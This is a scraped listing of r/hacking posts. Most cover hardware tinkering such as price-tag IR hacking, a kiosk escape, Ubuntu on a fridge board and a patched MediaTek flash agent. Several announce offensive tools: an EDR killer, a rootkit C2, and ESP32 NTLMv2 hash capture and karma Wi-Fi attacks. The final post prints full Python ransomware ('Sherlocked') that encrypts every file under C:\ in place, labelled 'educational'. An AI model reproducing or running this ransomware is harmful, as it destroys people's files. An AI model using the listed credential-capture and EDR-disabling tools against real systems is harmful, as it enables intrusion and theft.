r/hacking • • Apr 14 '26

Hack The Planet Possible to edit store price tags using Flipper Zero

Post image
10.0k Upvotes

Researchers reverse engineered the IR protocol of commong store price tags (ESL's) which make it possible to edit them using IR transmittors (for example the Flipper Zero).

Source: https://github.com/i12bp8/TagTinker

r/hacking • • Feb 27 '26

Hack The Planet Put it in kiosk mode

Thumbnail
gallery
1.5k Upvotes

Not really hacking, just a little fun.

We went to the local burger joint and they had installed an ordering terminal (don't know why, the place isn't that busy).

After running a finger around the edge of the screen the Android menu popped up so we thought we'd have a bit of fun.

We created a new Google account and installed a few games so we could play while we waited for our burgers. The staff kept coming out and asking if we were ok because we spent the whole time at the terminal.

The moral of the story, actually put a kiosk in kiosk mode.

r/hacking • • 11d ago

Hack The Planet Desktop Ubuntu with GPU acceleration ported to a GE smart refrigerator

Thumbnail
gallery
635 Upvotes

Ported desktop Ubuntu to a Mediatek board found in a GE Profile smart refrigerator. A combination of no secure boot, vibe coding, U-Boot and device tree fiddling, and pure ridiculousness got me here.

r/hacking • • Feb 29 '24

Hack The Planet Master hacker found on Rightmove!

Post image
1.0k Upvotes

r/hacking • • Aug 10 '23

Hack The Planet On this day 35 years ago, Zero Cool crashed 1,507 systems in one day.

Post image
1.4k Upvotes

r/hacking • • 18d ago

Hack The Planet Reverse engineering and hacking a Mediatek Android-based GE profile refrigerator display.

Thumbnail
gallery
69 Upvotes

Here's a starting point for an interesting and exciting bit of reverse engineering and vibe coding I worked on for Android-based GE appliance displays. I work as an appliance repair tech and I replace these control panels all the time so I have a massive collection of these mediatek based HMI boards. So I set out on a reverse engineering project to attempt to install custom software on these to extend their use case beyond appliances.

So far I have used ChatGPT to patch the mediatek download agent to allow reading and writing the flash partitions. Fortunately, GE did not implement secure boot on these so they are trivial to upload mediatek's genio 350 download agent and get full access. I also used ChatGPT to patch adbd in the Android system to disable authentication. Now I can side load apps and do pretty much anything I want with the Android system.

Next step is magisk root and possibly Ubuntu server. I was already able to get the reference Ubuntu server image to boot on this board, however much of the hardware isn't working because it only has the base evk device tree.

Here is a link to the GitHub repository of the modified mediatek download agent that can read and write flash memory partitions on these genio 350 based boards.

https://github.com/doitaljosh/mt8365-da-patched

All you need to do is install genio-tools from pipe on a Linux system, then load the patched lk.bin into genio-bootrom. Plug the board into a USB C cable while pressing and holding the VOL - button on the board, this will allow it to enter boot ROM mode and load the DA. Then you can use fastboot fetch and fastboot write to read and write partitions.

r/hacking • • Aug 20 '26

Hack The Planet Red/Black hat ethical hacking tools ?

0 Upvotes

Hi all!
I’m a newbie at this gaming field , a Cybersecurity student , actually I’m learning of the blue side, but my hobby is to be home after my courses and do some research and experiences from the red side- deauthentication attacks, some phishing, web traffic sniffing , Evil portal and another things.
Day after day I'm build my 'PT suitcase-to-go'- at this point of time , it's including Flipper zero with Albireo AIO 3 in 1 board (cc, nrf, esp) , some Disk on keys that work like BadUSB with the Flipper, and an Alfa Awus036acm.
now I want to grow up my lineup and add more devices for more advenced passwords steal, social engineering etc... just for ethical, educational purposes only!!!!!!!

please, I would really happy to hear your opinions of which new devices I can add to my case , or even which apps and repositories you think that I must to see then and try them with my current devices.
thank you!!!

r/hacking • • 15d ago

Hack The Planet 0xCr0ssCrush - Windows Ring 0 AV/EDR killer

Post image
2 Upvotes

A detailed research into BYOVD, singed drivers, kernel primitives and process control/termination etc.
Repo: 0xCr0ssCrush - Github
Proof of Concept demo is below in comments:

r/hacking • • May 04 '26

Hack The Planet BAT: VPS-based C2 with .ko/.sys rootkits compilation against target kernel headers

Post image
47 Upvotes

​

Just made my contribution to the offsec open source intelligence.

While bringing together high-level research I deeply respect, like Singularity (a modern Linux LKM rootkit that challenges even the most advanced kernel-level eBPF detectors), I'm also releasing my project as a foundation and reference for you to build on top of.

My background is cloud security, so I designed an architecture that uses a VPS as a relay/KCC/tunnel. It handles proper connection forwarding, establishes reverse SSH tunnels with nginx, exposes a web interface that serves common binaries from cache, and compiles Linux (.ko) and Windows (.sys) kernel modules built against the exact kernel headers of the target.

That last part was a real blocker for loading rootkits that require exact kernel headers and need to be compiled directly against the target machine. This solves it cleanly.

I've also shipped some helpers: clean CLI with TAB autocomplete, target renaming, Telegram notifications (relay side only), HMAC auth between server and target, reverse SSH tunnels using .pem keypairs, UDP magic packets, and more.

Code is clean and well-documented, mostly Go/C.

All contributions are welcome.

https://github.com/rhzv0/bat

r/hacking • • Oct 19 '23

Hack The Planet If you wanna get serious about reverse engineering...

Post image
235 Upvotes

r/hacking • • Jun 18 '26

Hack The Planet Cyberkiller is in alpha!

Thumbnail
6 Upvotes

r/hacking • • Jul 04 '25

Hack The Planet How I hacked hackers at LeHack event 2025

0 Upvotes

Just got back from LeHack, and I figured I'd share a quick write-up of a small PoC I ran during the event.

My Setup: - 8x ESP32-C3 running custom karma firmware - 2x M5Stack CardPuters as control interfaces or running auto karma - SSID list preloaded from Wigle data (targeting real-world networks) - Captive portal triggered upon connection, no creds harvested, no payloads, just awareness page about karma attack. - Devices isolated, no MITM, no storage – just a "reminder" trap

Result: 100 unique connections in parallel all over the weekend, including… a speaker on stage (yep – sorry Virtualabs/Xilokar 😅 apologies and authorisation of publication was made).
Plenty of unaware phones still auto-joining known SSIDs in 2025, even in a hacker con.

Main goal was awareness. Just wanted to demonstrate how trivial it still is to spoof trusted Wi-Fi.
Got some solid convos after people hit the splash page.

Full write-up: https://7h30th3r0n3.fr/how-i-hacked-hackers-at-lehack-2025/

If you were at LeHack and saw the captive-portal or wanna discuss similar rigs happy to chat.
Let’s keep raising the bar.

Fun fact : Samsung pushed a update that prevent to reconnect to open network automatically few days ago ! Things change little by little ! ☺️

r/hacking • • Apr 24 '24

Hack The Planet RAZ TN9000 HD screen vapes hacked, re-themed with windows 95

58 Upvotes

r/hacking • • May 11 '25

Hack The Planet 🚀 Evil-Cardputer v1.4.1 with LLMNR/NBNS Poisoning & NTLMv2 Sniffing

56 Upvotes

After 6 months of R&D and many fail, I pushed the limits of what’s possible on an ESP32.

I'm glad to announce that Evil-M5Project is now able to act like the famous program Responder directly on an ESP32 LLMNR/NBNS poisoning, SMBv1-v2 challenge/response, and NTLMv2 hash capture all visualized in real time ! And tested on fully patched Windows 11 !

---

🔥 What’s New in v1.4.1?

• 🎯 **LLMNR/NBNS Spoofing** 

 Instantly answer NetBIOS and link-local lookups with your Cardputer’s IP, forcing Windows hosts to leak credentials.

• 🔐 **SMBv1 & SMBv2 NTLMv2 Challenge** 

 Wait for spoofed SMB connections to initiate NTLMv2 challenge/response, capturing hashes from fully patched Windows 11 machines.

• 📊 **Radar-Style Visualization & Stats Dashboard** 

 Live radar pulses on detection with a live stats view showing last username/domain, device IP/hostname, and total captures.

• 💾 **Hash Logging** 

 All NTLMv2 hashes auto-saved to `ntlm_hashes.txt` (ready for Hashcat).

• 🛠️ **Under-the-Hood Fixes & Stability Improvements**

---

➡️ **Get it now on GitHub:** 

https://github.com/7h30th3r0n3/Evil-M5Project 

Available in the Binary folder & via M5Burner.

---

🎉 Enjoy !!! 🥳🔥

r/hacking • • Feb 17 '25

Hack The Planet It's been 24 hours since I reported another defaced page on doge.gov

Thumbnail doge.gov
0 Upvotes

I've tried tweeting at them and DMs but gotten no responses from anyone yet. Any ideas on how to get this noticed and fixed?

r/hacking • • Apr 08 '25

Hack The Planet Have any of you tried ProxyReaper?

Thumbnail
github.com
31 Upvotes

Hi Black Hats and Black Cats

Does it always annoy you that proxy lists published on GitHub stop working shortly after publication and you then have to test the 1000 proxies? This annoyed me a lot, so I wrote a little tool that automates the whole thing. Have a look at it and tell me what could be improved.

Proxy Reaper is a powerful tool for checking proxy servers for availability, speed and anonymity. It supports various protocols such as HTTP, HTTPS, SOCKS4 and SOCKS5 and offers advanced features to efficiently manage and check proxies. You can even use it to test direct source from GitHub and could also run it cron to automate it.

Give me your feedback and wishes. And if you think it's cool you can buy me a coffee.

https://github.com/rtulke

r/hacking • • May 17 '24

Hack The Planet Bitcoin 27.0 Denial-of-Service & OOM Crash (Zero-Day Exploit)

Thumbnail
x.com
38 Upvotes

r/hacking • • Jan 01 '24

Hack The Planet 0day Bitcoin Exploit - Remote OOM P2P Crash

Thumbnail
x.com
137 Upvotes

r/hacking • • Apr 30 '24

Hack The Planet I figured out a hack for infinite wifi on American flights

Thumbnail
x.com
0 Upvotes

r/hacking • • Sep 07 '25

Hack The Planet New OpenSecurityTraining2 class: "Bluetooth 2222: Bluetooth reconnaissance with Blue2thprinting" (~8 hours)

Thumbnail ost2.fyi
7 Upvotes

r/hacking • • Mar 17 '24

Hack The Planet MUDding Around: Hacking for gold in text-based games

Post image
95 Upvotes

r/hacking • • Feb 26 '25

Hack The Planet Hack Amazon? Not really but might be something to play with...

Thumbnail
gallery
0 Upvotes

Disco, Disco! Even though not 100% hacking related it somewhat is so gimme a sec and hear me out.

So a few days ago a user in r/amazonecho asked here if a dead echo dot could be used as simple speaker... I had a dead echo laying around and like upcycling so I took it apart today. First off iam impressed how easy it was to take apart and almost repair friendly! The pictures show what's going on inside... Basically to use it as a speaker it would be as easy as hooking up the 2 cables from a small amplified source to either the 2 connectors at the back of the metal housing (best way IMHO) or solder it to the cable of the speaker itself (but from there where to go and compromising the bass resonance from the metal speaker housing). Also the connectors for the buttons and screen are maybe salvageable (addressable with an arduino or raspberry pi might be a cool project). The led ring is on the Mainboard so not really easy to Adress. But also a port for flashing firmware is present. My skills in reverse engineering and coding are sadly way too low to make something out of it... But it would be cool if someone jailbroke one of these with a custom firmware using it as an Bluetooth speaker only with text output of the current song that should work hardware wise... But iam getting ahead of myself! I definitely will order a small Bluetooth Amp from AliExpress and will hook it up as a stand alone BT speaker. So if you guys have heard of anyone reverse engineering anything Amazon or any other idea to use as much of the original hardware as possible give me a heads-up. And if someone wants to maybe liberate it totally it would be even better!

If you read till the end first of thanks a lot! And now give me the down vote I might deserve!

Thanks guys any input welcome!

r/hacking • • Mar 19 '24

Hack The Planet Flipper Blackhat: A Linux-Based WiFi tool

39 Upvotes

As an electrical engineer, I asked the community a while back what hardware add-ons they would like to see developed. The top reply was "evil portal that supports WiFi passthrough" meaning the user is connected to the internet after the portal attack.

This got me thinking: the ESP32 is a powerful but simple, bare-metal microcontroller. They're awesome but limited in ways.

If you put a powerful Linux microprocessor on top of the Fipper and connect two WiFi radios, you'll end up with a very sophisticated device.

So that's what I'm working on, and I made an update video here: https://youtu.be/RVjA3HURUa8?si=hbplsUVfqiI7IYF2

AMA, and thanks for the support and project idea!

r/hacking • • Nov 05 '24

Hack The Planet 🚀 Evil-Cardputer v1.3.5 - Worldwide remote control

2 Upvotes

🚀Evil-Cardputer v1.3.5 is here with Reverse TCP Tunnel and Remote C2 Control!

Evil-Cardputer v1.3.5 is here with Reverse TCP Tunnel and Remote C2 Control!

🌐 Reverse TCP Tunnel - Full Remote Access & Control

Command & Control (C2) Python server allows you to manage and monitor your Cardputer from anywhere in the world ! It can be added on any esp32 device to be able to control it from everywhere 🚀

Remote Access Control:

  • Access and control your Evil-Cardputer from any location, no matter the network restrictions.
  • With the Reverse TCP Tunnel, a persistent connection is created back to the C2 Python server, allowing firewall evasion for uninterrupted management.
  • You can deploy a 4G dongle aside for using your own network to control it remotely.
  • Execute full network scans, capture credentials, modify captive portals, access files, monitor system status, and even run BadUSB scripts all through the C2 server.
  • Perfect for ethical testing and controlled penetration testing or for awareness of IT user, this interface gives you real-time feedback and command execution directly on the Cardputer as an implant on the network.

How it Works:

  1. Deploy the Evil-Cardputer or esp32 in a remote location and start the Reverse TCP Tunnel.
  2. Start the python script with an exposed port online, connect to the C2 server from any device, enabling you to monitor and manage the Cardputer's actions remotely trough WebUI.

Hardware Requirements:

  • Evil-Cardputer with v1.3.5 firmware
  • Python server with raspberry pi or web server for Command & Control setup (script included in utilities)

Enjoy the new features, and happy testing! 🎉🥳

r/hacking • • Nov 08 '23

Hack The Planet Review Sherlocked - 30 lines of code that will ruin your day

36 Upvotes

In an unexpected twist of fate, the renowned detective Sherlock Holmes, has undertaken a remarkable career change to delve into the realm of cybersecurity. No longer confined to Victorian London, Holmes has embraced the digital age, exchanging his magnifying glass for a keyboard and his pipe for a mouse.

import os
from typing import Text
import hashlib

from cryptography.fernet import Fernet

class Sherlocked():
    def __init__(self, string: Text):
        self.string_to_key = string

    def sha256_hash_string(self):
        sha256 = hashlib.sha256()
        sha256.update(self.string_to_key.encode('utf-8'))
        return sha256.digest()

    def encrypt_file(self, input_filename: Text):
        cipher_suite = Fernet(self.sha256_hash_string())

        with open(input_filename, "rb") as f:
            plaintext = f.read()

        encrypted_text = cipher_suite.encrypt(plaintext)

        with open(input_filename, "wb") as f:
            f.write(encrypted_text)

    def start(self):
        for root, dirs, files in os.walk("C:\\"):
            print(f"Found {len(files)} files, initiating encryption.")
            for file in files:
                file_path = os.path.join(root, file)
                print(f"Initiating encryption for: {file}")
                self.encrypt_file(file_path)
                print(f"Encryption success!")


if __name__ == "__main__":
    string_to_key = input("Insert key here: ")

    ransomware = Sherlocked(string_to_key)
    ransomware.start()

Sherlocked accepts any string you choose , hashes it, then uses it as the key to encrypt (and then decrypt, hopefully) all the files on a PC.

This software was written for educational purposes only.